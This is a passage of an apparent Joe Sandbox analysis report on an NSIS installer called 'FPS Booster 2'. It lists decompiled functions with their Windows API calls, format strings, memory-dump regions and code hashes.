                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(File: skipped: "C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dll" (overwriteflag=1),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                Strings
                                                • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                • API String ID: 1697273262-1764544995
                                                • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(File: skipped: "C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dll" (overwriteflag=1),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                  • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                  • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                • lstrlenW.KERNEL32 ref: 004026B4
                                                • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                • String ID: CopyFiles "%s"->"%s"
                                                • API String ID: 2577523808-3778932970
                                                • Opcode ID: 76b1160061a8bcde82d673e25faa9719cd8acd17af1c4b15f649e1f749d05235
                                                • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                • Opcode Fuzzy Hash: 76b1160061a8bcde82d673e25faa9719cd8acd17af1c4b15f649e1f749d05235
                                                • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: lstrcatwsprintf
                                                • String ID: %02x%c$...
                                                • API String ID: 3065427908-1057055748
                                                • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: PrivateProfileStringWritelstrcpyn
                                                • String ID: <RM>$Show$WriteINIStr: wrote [%s] %s=%s in %s
                                                • API String ID: 247603264-2407876207
                                                • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD
                                                Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OleInitialize.OLE32(00000000), ref: 00405083
                                                  • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(File: skipped: "C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dll" (overwriteflag=1),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                • String ID: Section: "%s"$Skipping section: "%s"
                                                • API String ID: 2266616436-4211696005
                                                • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                Function 6FFB14B2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 24COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 6FFB13F8: GetPropW.USER32(?,NSIS: nsControl pointer property), ref: 6FFB1401
                                                • LoadCursorW.USER32(00000000,00007F89), ref: 6FFB14CE
                                                • SetCursor.USER32(00000000,?,?,?), ref: 6FFB14D5
                                                • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 6FFB14F2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602569246.000000006FFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FFB0000, based on PE: true
                                                • Associated: 00000007.00000002.2602537115.000000006FFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.2602601497.000000006FFB3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.2602632211.000000006FFB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6ffb0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Cursor$CallLoadProcPropWindow
                                                • String ID:
                                                • API String ID: 1635134901-3916222277
                                                • Opcode ID: 187e4e5c36e648225258dcf07840df28b0a39d944ebebbea49e47999a3dc73d5
                                                • Instruction ID: cad228a4e6c2b0a413108ccb12fc1613e027c47bb053b8497ab41957c55be87e
                                                • Opcode Fuzzy Hash: 187e4e5c36e648225258dcf07840df28b0a39d944ebebbea49e47999a3dc73d5
                                                • Instruction Fuzzy Hash: D1E0ED3219460AFBDF015FA1CD4AB993B69FF0A396F048534FA29991A0CB719120DB61
                                                Function 6E9E1108 Relevance: 6.4, APIs: 5, Instructions: 106memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 6E9E15A3: lstrcpyW.KERNEL32(00000000,?,?,?,6E9E185F,?,6E9E1017), ref: 6E9E15C1
                                                  • Part of subcall function 6E9E15A3: GlobalFree.KERNEL32 ref: 6E9E15D2
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 6E9E118F
                                                • GlobalFree.KERNEL32(00000000), ref: 6E9E11D0
                                                • GlobalFree.KERNEL32(00000000), ref: 6E9E11F0
                                                • GlobalFree.KERNEL32(00000000), ref: 6E9E1204
                                                • GlobalFree.KERNEL32(?), ref: 6E9E122E
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602445757.000000006E9E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6E9E0000, based on PE: true
                                                • Associated: 00000007.00000002.2602410980.000000006E9E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                • Associated: 00000007.00000002.2602469964.000000006E9E3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                • Associated: 00000007.00000002.2602504176.000000006E9E5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6e9e0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloclstrcpy
                                                • String ID:
                                                • API String ID: 852173138-0
                                                • Opcode ID: 4efe0d6e25cc2eefa902258e8f0ba69990fc850d6ca58e6d2730f2753fe8799c
                                                • Instruction ID: 21ab988a3f6daa7e80b306cef85696fad5eed2e4b1167759c88843533ba9d55c
                                                • Opcode Fuzzy Hash: 4efe0d6e25cc2eefa902258e8f0ba69990fc850d6ca58e6d2730f2753fe8799c
                                                • Instruction Fuzzy Hash: 5131C5B2808201DFD7528FEADC44AB97BECFF4B251B000925EB54D7A50E734DD498E20
                                                Function 6E9E199F Relevance: 6.2, APIs: 4, Instructions: 179COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 6E9E15A3: lstrcpyW.KERNEL32(00000000,?,?,?,6E9E185F,?,6E9E1017), ref: 6E9E15C1
                                                  • Part of subcall function 6E9E15A3: GlobalFree.KERNEL32 ref: 6E9E15D2
                                                • GlobalFree.KERNEL32(?), ref: 6E9E1A04
                                                • GlobalFree.KERNEL32(?), ref: 6E9E1A9C
                                                • GlobalFree.KERNEL32(?), ref: 6E9E1AA1
                                                • __alldvrm.LIBCMT ref: 6E9E1ACB
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602445757.000000006E9E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6E9E0000, based on PE: true
                                                • Associated: 00000007.00000002.2602410980.000000006E9E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                • Associated: 00000007.00000002.2602469964.000000006E9E3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                • Associated: 00000007.00000002.2602504176.000000006E9E5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6e9e0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: FreeGlobal$__alldvrmlstrcpy
                                                • String ID:
                                                • API String ID: 1811517867-0
                                                • Opcode ID: 147d0771ab3fdc434a3156f2ad4bebd73f8d87d118602f14fee540c7a5296cad
                                                • Instruction ID: 4b97b624ea94fdaf9d78096e9ebd2a4f82fa34cfd39c68ec976e1728f6099a37
                                                • Opcode Fuzzy Hash: 147d0771ab3fdc434a3156f2ad4bebd73f8d87d118602f14fee540c7a5296cad
                                                • Instruction Fuzzy Hash: BF51EE31D04109FB9B93DFEB84809BDB7B9AF873147148956D728B3914E670DF488E51
                                                Function 6E9E2800 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 6E9E1C1B: GlobalFree.KERNEL32(?), ref: 6E9E1E69
                                                  • Part of subcall function 6E9E1C1B: GlobalFree.KERNEL32(?), ref: 6E9E1E6E
                                                  • Part of subcall function 6E9E1C1B: GlobalFree.KERNELBASE(?), ref: 6E9E1E73
                                                • GlobalFree.KERNEL32(00000000), ref: 6E9E2868
                                                  • Part of subcall function 6E9E15E0: GlobalAlloc.KERNEL32(00000040,?,?,6E9E18AA,?), ref: 6E9E15F6
                                                  • Part of subcall function 6E9E15E0: lstrcpynW.KERNEL32(00000004,?,?,6E9E18AA,?), ref: 6E9E160C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602445757.000000006E9E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6E9E0000, based on PE: true
                                                • Associated: 00000007.00000002.2602410980.000000006E9E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                • Associated: 00000007.00000002.2602469964.000000006E9E3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                • Associated: 00000007.00000002.2602504176.000000006E9E5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6e9e0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloclstrcpyn
                                                • String ID: error
                                                • API String ID: 4250884139-1574812785
                                                • Opcode ID: f79aff1de5328bdc23e64f3da941d11c13acf6d5044f17c9902fa1c98d3b9eae
                                                • Instruction ID: ee18867478b7bac41f8c4bed0efadf7281876d73b21242b2f71cfd23add0203c
                                                • Opcode Fuzzy Hash: f79aff1de5328bdc23e64f3da941d11c13acf6d5044f17c9902fa1c98d3b9eae
                                                • Instruction Fuzzy Hash: 5501A1B250C601AAC753DBF5D444BDE7BECAF933A9F00082AE34493950DB70D8498EA2
                                                Function 6FFB128F Relevance: 6.1, APIs: 4, Instructions: 53stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenW.KERNEL32(?,00000000,00000400,?,00000400,?,76F8F380), ref: 6FFB129A
                                                • CharPrevW.USER32(?,00000000,?,76F8F380), ref: 6FFB12A5
                                                • MulDiv.KERNEL32(00000000,00000000,00000064), ref: 6FFB12C6
                                                • MapDialogRect.USER32(?,?), ref: 6FFB12EB
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602569246.000000006FFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FFB0000, based on PE: true
                                                • Associated: 00000007.00000002.2602537115.000000006FFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.2602601497.000000006FFB3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.2602632211.000000006FFB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6ffb0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: CharDialogPrevRectlstrlen
                                                • String ID:
                                                • API String ID: 3411278111-0
                                                • Opcode ID: c475eb5781d0a8c1401a6fd2ebbf3464fa405a1acd68ef0199485d2077dba616
                                                • Instruction ID: 45ef87d6d8144362c8df644075ba2f1707e40c48bb95937de7dcfbffa143e04d
                                                • Opcode Fuzzy Hash: c475eb5781d0a8c1401a6fd2ebbf3464fa405a1acd68ef0199485d2077dba616
                                                • Instruction Fuzzy Hash: 4F01DB72D00624DBCB119F5ACC84BAEBBFCEF46365B01011AF801E7254E3709910CBD0
                                                Function 6FFB142D Relevance: 6.0, APIs: 4, Instructions: 44memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CallWindowProcW.USER32(?,?,?,?), ref: 6FFB146D
                                                • DestroyWindow.USER32 ref: 6FFB1484
                                                • GetProcessHeap.KERNEL32(00000000), ref: 6FFB1491
                                                • HeapFree.KERNEL32(00000000), ref: 6FFB1498
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602569246.000000006FFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FFB0000, based on PE: true
                                                • Associated: 00000007.00000002.2602537115.000000006FFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.2602601497.000000006FFB3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.2602632211.000000006FFB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6ffb0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: HeapWindow$CallDestroyFreeProcProcess
                                                • String ID:
                                                • API String ID: 1278960361-0
                                                • Opcode ID: 47a3e2fa0bbfc87515ecc1ad7bd6c4f36c6c0f1d3048f20dc24b9263faf27948
                                                • Instruction ID: d170c3b6b6fab5c89bdffd25008d8862d5c747fa85e7926be9239366ca64fcb3
                                                • Opcode Fuzzy Hash: 47a3e2fa0bbfc87515ecc1ad7bd6c4f36c6c0f1d3048f20dc24b9263faf27948
                                                • Instruction Fuzzy Hash: 94015A32564A08EFCF129F56DD88B893B79FF4A3B2B11812AFA1986270C7309425DF50
                                                Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: lstrcpyn$CreateFilelstrcmp
                                                • String ID: Version
                                                • API String ID: 512980652-315105994
                                                • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                Download Yara Rule
                                                APIs
                                                • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                • GetTickCount.KERNEL32 ref: 00403303
                                                • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                • String ID:
                                                • API String ID: 2102729457-0
                                                • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                • String ID:
                                                • API String ID: 2883127279-0
                                                • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 0040492E
                                                • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                  • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
